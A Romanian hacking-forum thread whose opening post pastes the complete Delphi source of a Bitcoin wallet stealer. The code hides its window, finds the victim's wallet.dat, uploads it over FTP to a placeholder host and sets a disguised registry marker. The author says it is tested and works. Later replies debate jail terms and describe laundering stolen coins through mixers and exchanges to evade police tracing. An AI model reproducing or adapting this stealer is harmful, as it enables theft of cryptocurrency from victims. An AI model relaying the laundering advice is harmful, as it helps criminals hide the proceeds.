TheRogue27 Posted March 9, 2015 Report Share Posted March 9, 2015 Ce parere aveti despre wallet stealer-ul astahttps://leakforums.org/thread-232703program dbs;// Bitcoin Stealer// developed by Jimmy// for http://exclusivehackingtools.blogspot.com{$IF CompilerVersion >= 21.0} {$WEAKLINKRTTI ON} {$RTTI EXPLICIT METHODS([]) PROPERTIES([]) FIELDS([])}{$IFEND}uses Windows, System.SysUtils, System.Classes, ShlObj, IdFTP, Registry;// Function to set the window state hiddenfunction GetConsoleWindow: HWND; stdcall; external kernel32 name 'GetConsoleWindow';// Function to get the AppData pathfunction AppDataPath: String;const SHGFP_TYPE_CURRENT = 0;var Path: array [0 .. MAXCHAR] of char;begin SHGetFolderPath(0, CSIDL_LOCAL_APPDATA, 0, SHGFP_TYPE_CURRENT, @path[0]); Result := StrPas(Path);end;// Function to check a file sizefunction FileSize(FileName: wideString): Int64;var sr: TSearchRec;begin if FindFirst(FileName, faAnyFile, sr) = 0 then Result := Int64(sr.FindData.nFileSizeHigh) shl Int64(32) + Int64(sr.FindData.nFileSizeLow) else Result := -1; FindClose(sr);end;// Function to generate random stringfunction RandomString(PLen: Integer): string;var str: string;begin Randomize; str := 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; Result := ''; repeat Result := Result + str[Random(Length(str)) + 1]; until (Length(Result) = PLen);end;// ============================================================================var Debug: Boolean; FTP: TIdFTP; REG: TRegIniFile; RegPath, RegValue, RegCurrentValue, Path, UploadPath, FileName: String; Error: String;begin // The window should be hidden without using this API ShowWindow(GetConsoleWindow, SW_HIDE); // Debug or build release ? Debug := True; // Set registry key value (random) RegValue := '6556'; // At the end of the first execution we will write a key in the registry. // Now we will try check if the key exists. If yes, it means // that the wallet has already be stolen. Avoid useless duplicates. try REG := TRegIniFile.Create; REG.RootKey := HKEY_CURRENT_USER; REG.OpenKeyReadOnly('Software'); RegCurrentValue := REG.ReadString('Google', 'Version', ''); REG.CloseKey; REG.Free; except end; // Check if wallet has been already stolen (to avoid duplicates) if not(RegCurrentValue = RegValue) then begin try // Generate path to Bitcoin wallet file if Win32MajorVersion >= 6 then // Microsoft Windows Vista and newer Path := ExpandFileName(AppDataPath + '\..\Roaming\Bitcoin\wallet.dat') else // Microsoft Windows XP Path := ExpandFileName(AppDataPath + '\..\Bitcoin\wallet.dat'); // If wallet file exists, check the FileSize (skip large file > 10MB) if FileExists(Path) then if FileSize(Path) < 10000000 then begin // Generate a random filename FileName := RandomString(20) + '.dat'; // Initialize upload via Indy FTP component FTP := TIdFTP.Create(); FTP.ConnectTimeout := 20000; FTP.ReadTimeout := 20000; // Setup with your FTP details FTP.Host := 'ftp.host.com'; FTP.Username := 'username'; FTP.Password := 'password'; UploadPath := 'www/'; // Connect and upload if not Debug then begin FTP.Connect; FTP.Put(Path, UploadPath + FileName); end; // After upload attempt, disconnect and free the FTP component FTP.Quit; FTP.Disconnect; FTP.Free; // Try to add a key to registry to avoid double execution try REG := TRegIniFile.Create; REG.RootKey := HKEY_CURRENT_USER; REG.OpenKey('Software', True); REG.WriteString('Google', 'Version', RegValue); REG.CloseKey; REG.Free; except end; end; except // Catch error, you never know... on E: Exception do Error := E.ClassName + ': ' + E.Message; end; end;end. 1 Quote Link to comment Share on other sites More sharing options...
galeata123 Posted March 9, 2015 Report Share Posted March 9, 2015 La încercat cineva? Quote Link to comment Share on other sites More sharing options...
Pastilatu' Posted March 9, 2015 Report Share Posted March 9, 2015 eu zic ca e bun nu ca zic ...but the code looks legit. Quote Link to comment Share on other sites More sharing options...
TheRogue27 Posted March 11, 2015 Author Report Share Posted March 11, 2015 A reusit cineva sa il testeze? eu l-am cimpilat dar nu am pe ce/cum sa il verific Quote Link to comment Share on other sites More sharing options...
Che Posted March 11, 2015 Report Share Posted March 11, 2015 A reusit cineva sa il testeze? eu l-am cimpilat dar nu am pe ce/cum sa il verific"Cimpilat" ?! Referitor la topicul tau:Wallet stealer - pareriPareri... Pai cam intre 2 si 5 ani pentru buna purtare, la romani, la americani intre 20 si 50 de ani pentru buna purtare. Quote Link to comment Share on other sites More sharing options...
Pastilatu' Posted March 11, 2015 Report Share Posted March 11, 2015 "Cimpilat" ?! Referitor la topicul tau:Pareri... Pai cam intre 2 si 5 ani pentru buna purtare, la romani, la americani intre 20 si 50 de ani pentru buna purtare. Eh , de parca stie Politia Romana ce e ala Bitcoin. Fi serios. Ca sa numai zic de tracking-ul la fonduri prin mai multe Mixere ... hehe ... ce-ai bai baiatule baga-ti mintile in cap ...bani dispar pe exchange-uri bagate in alte monezi dupaia scoase dupaia bagate pe un cont frumos facute cold storage si te doare la basca. 1 Quote Link to comment Share on other sites More sharing options...
Che Posted March 12, 2015 Report Share Posted March 12, 2015 Eh ' date=' de parca stie Politia Romana ce e ala Bitcoin. Fi serios. Ca sa numai zic de tracking-ul la fonduri prin mai multe Mixere ... hehe ... ce-ai bai baiatule baga-ti mintile in cap ...bani dispar pe exchange-uri bagate in alte monezi dupaia scoase dupaia bagate pe un cont frumos facute cold storage si te doare la basca.[/quote']Ai un miliard de lei sa zicem. (lei vechi) Si sa zicem ca-s castigati la ruleta intr-un cazinou. Ai de la cazinou o data ce ti-au dat banii ti-au trecut si datele tale cum ca i-ai incasat. Sa zicem ca vrei sa eviti acel impozit pe castigurile din jocurile de noroc.Banii figureaza pe numele tau. Ce faci ca sa eviti impozitul ? Ii transformi in dolari si pe urma in euro ? Si pe urma ?Alta varianta. Banii sunt proveniti din alte activitati care nu figureaza in acte contabile.Doar nu o sa tii un miliard sub saltea, ii pui la o banca. Brusc figurezi in acte, real, ca ai un milard de lei. Deja totul e limpede, ai bani, trebuie sa spui de unde si cum.Alta varianta ?Explica mai pe larg daca nu te superi, ca-s tare curios de ce zici tu.Apropo, politistii cred ca bitcoinul e o chestie care se pune la epoleti. Quote Link to comment Share on other sites More sharing options...
Pastilatu' Posted March 12, 2015 Report Share Posted March 12, 2015 Ai un miliard de lei sa zicem. (lei vechi) Si sa zicem ca-s castigati la ruleta intr-un cazinou. Ai de la cazinou o data ce ti-au dat banii ti-au trecut si datele tale cum ca i-ai incasat. Sa zicem ca vrei sa eviti acel impozit pe castigurile din jocurile de noroc.Banii figureaza pe numele tau. Ce faci ca sa eviti impozitul ? Ii transformi in dolari si pe urma in euro ? Si pe urma ?Alta varianta. Banii sunt proveniti din alte activitati care nu figureaza in acte contabile.Doar nu o sa tii un miliard sub saltea, ii pui la o banca. Brusc figurezi in acte, real, ca ai un milard de lei. Deja totul e limpede, ai bani, trebuie sa spui de unde si cum.Alta varianta ?Explica mai pe larg daca nu te superi, ca-s tare curios de ce zici tu.Apropo, politistii cred ca bitcoinul e o chestie care se pune la epoleti. Pai da ma dar eu vorbesc strict despre Bitcoin .... . Quote Link to comment Share on other sites More sharing options...
mundy. Posted March 12, 2015 Report Share Posted March 12, 2015 Omu` a intrebat daca l-a folosit cineva, chiar nimeni nu l-a testat ? Quote Link to comment Share on other sites More sharing options...
CodatuThau Posted March 25, 2015 Report Share Posted March 25, 2015 E bun Quote Link to comment Share on other sites More sharing options...
TYJ Posted March 25, 2015 Report Share Posted March 25, 2015 Pai deja aici intra frauda.Clonare de carduri = furtul de pe card = golirea walletului de bitcoin. BTC tot bani sunt, cardurile tot bani sunt. Deci tot frauda faci cand zici "wallet steaker".E legala aceasta metoda de furt? NU! Nu este.Pa! Quote Link to comment Share on other sites More sharing options...
TheRogue27 Posted March 27, 2015 Author Report Share Posted March 27, 2015 Ba nu am mai vazut asa ceva...parca sunt pe forumul www.maicutele.roAm pus o intrebare. Nu am nevoie de morala voastra, de impresiile voastre de oameni cinstiti.Se poate inchide, testat si functioneaza 1 Quote Link to comment Share on other sites More sharing options...
Worm64 Posted March 27, 2015 Report Share Posted March 27, 2015 @Pastilatu': Nu stiu daca stiai dar FBI organizeaza training-uri periodice la bucuresti.Acei politisti care se ocupa cu investigarea fraudelor informatice au habar.Chiar au fost arestari in care au fost aduse ca probe la dosar adrese de btc+tranzactii de pe blockchain.BTC nu este chiar asa anonim si sigur pe cat pare. Quote Link to comment Share on other sites More sharing options...
TheRogue27 Posted March 27, 2015 Author Report Share Posted March 27, 2015 Da ma, da, stim ca sunt oameni competenti, dar face-ti topic separat pt. discutiile astea. Ce rost isi au discutiile astea ? Quote Link to comment Share on other sites More sharing options...
bleg Posted March 27, 2015 Report Share Posted March 27, 2015 Nu mai pot cu cardurile voastre pisa-m-as pe ele! Numai carduri si lovele aveti in cap! @TheRogue27 a pus un cod sursa si a vrut pareri despre el, adica oameni care se pricep si/sau au testat! Voi ce ati facut, ati inceput sa o ardeti cu cardurile. Pisa-m-as pe ele bis! Quote Link to comment Share on other sites More sharing options...
Pastilatu' Posted March 27, 2015 Report Share Posted March 27, 2015 @Pastilatu': Nu stiu daca stiai dar FBI organizeaza training-uri periodice la bucuresti.Acei politisti care se ocupa cu investigarea fraudelor informatice au habar.Chiar au fost arestari in care au fost aduse ca probe la dosar adrese de btc+tranzactii de pe blockchain.BTC nu este chiar asa anonim si sigur pe cat pare.Nu te contrazic , nu are rost oricum a degenerat discutia. Dar ca sa iti zic asa ..... acum cateva luni sau furat milioane de dolari in Bitcoin .... where is FBI ? Nu e o retea anonima ...bineinteles, dar exista BitMixere .... . Am incercat eu sa urmaresc un jaf de genu de la unu din exchange-uri ...si m-am pierdut dupa a 3 a transa de mutare a fondurilor. 1 Quote Link to comment Share on other sites More sharing options...